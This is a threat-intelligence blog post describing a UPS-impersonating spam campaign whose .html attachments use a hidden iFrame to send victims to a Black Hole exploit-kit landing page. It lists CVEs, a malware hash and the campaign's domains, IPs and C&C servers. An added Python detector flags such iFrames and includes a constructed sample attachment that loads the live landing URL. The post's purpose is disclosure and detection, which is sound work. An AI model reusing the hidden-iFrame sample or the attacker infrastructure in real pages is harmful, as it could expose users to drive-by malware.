Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit


Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end users and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a landing URL serving client-side exploits, courtesy of the Black Hole web malware exploitation kit.

More details:

Sample screenshot of the spamvertised email:

Sample client-side exploit-serving URL: hxxp://mskoblastionline.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c

Sample exploits served: CVE-2010-0188; CVE-2010-1885

Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e – detected by 28 out of 42 antivirus scanners as Worm:Win32/Cridex.E; Trojan.Win32.Buzus.lxwt

mskoblastionline.ru – 50.56.92.47; 190.120.228.92; 203.80.16.81

Name servers part of the campaign’s infrastructure:
ns1.mskoblastionline.ru – 85.143.166.186
ns2.mskoblastionline.ru – 203.172.140.202
ns3.mskoblastionline.ru – 87.120.41.155
ns4.mskoblastionline.ru – 173.224.208.60
ns5.mskoblastionline.ru – 132.248.49.112

Responding to these IPs are also the following malicious command and control servers:

penelopochka.ru
sergikgorec.ru
kolmykiaonline.ru
mskoblastionline.ru
panalki.ru
anapoli.ru
flumifrator2unix.ru

We’ve already seen these domains and IPs used in previously profiled campaigns such as the “Spamvertised ‘Fwd: Scan from a Hewlett-Packard ScanJet’ emails lead to Black Hole exploit kit” and the “Cybercriminals impersonate Intuit Market, mass mail millions of exploits and malware serving emails” campaigns.
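The following is an added detection example, not code from this post or from Webroot: it parses an .html attachment for tiny or hidden iFrames (the delivery mechanism described above) and flags any whose target matches the campaign's domains and IPs listed here, or the Black Hole landing URL shape (/forum/showthread.php?page=<16 hex chars>) quoted above. The sample attachment is constructed for the example; the indicator sets and landing URL come from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from this post: C&C/exploit-serving domains and the IPs they resolve to.
CAMPAIGN_DOMAINS = {"mskoblastionline.ru", "penelopochka.ru", "sergikgorec.ru", "kolmykiaonline.ru",
                    "panalki.ru", "anapoli.ru", "flumifrator2unix.ru"}
CAMPAIGN_IPS = {"50.56.92.47", "190.120.228.92", "203.80.16.81"}
# Shape of the Black Hole landing URL quoted in the post: /forum/showthread.php?page=<16 hex chars>
BLACKHOLE_LANDING = re.compile(r"/forum/showthread\.php\?page=[0-9a-f]{16}$")

def _px(value):
    try:
        return int(str(value).rstrip("px"))
    except ValueError:
        return 10 ** 6  # absent or unparseable size: treat as not tiny

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.suspicious = []  # src of every iframe rendered 1x1 or smaller, or hidden via display:none
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = _px(a.get("width")) <= 1 or _px(a.get("height")) <= 1 or "display:none" in style
        if hidden and a.get("src"):
            self.suspicious.append(a["src"])

def scan_attachment(html):
    """Return [(iframe src, [reasons])] for each hidden iframe in an .html attachment."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for src in collector.suspicious:
        u = urlparse(src.replace("hxxp", "http", 1))  # accept defanged URLs pasted from reports
        host = (u.hostname or "").lower()
        reasons = ["tiny_iframe"]
        if host in CAMPAIGN_DOMAINS or host in CAMPAIGN_IPS:
            reasons.append("known_campaign_host")
        if BLACKHOLE_LANDING.search(u.path + "?" + u.query):
            reasons.append("blackhole_landing_pattern")
        findings.append((src, reasons))
    return findings

# Constructed sample attachment (not a real capture) that loads the landing URL quoted in the post.
SAMPLE_ATTACHMENT = ('<html><body>Your UPS shipment details are loading...<iframe width="1" height="1" '
                     'src="http://mskoblastionline.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c">'
                     '</iframe></body></html>')
```

Run `scan_attachment(SAMPLE_ATTACHMENT)` to see the three reasons fire together; a benign full-size iFrame produces no finding, and a hidden iFrame to an unknown host is still reported as tiny_iframe for analyst review.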

This isn’t the first time we’ve profiled malicious campaigns impersonating the United Parcel Service. Consider going through related posts profiling the dynamics of related campaigns:

Webroot SecureAnywhere users are proactively protected from this threat.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.

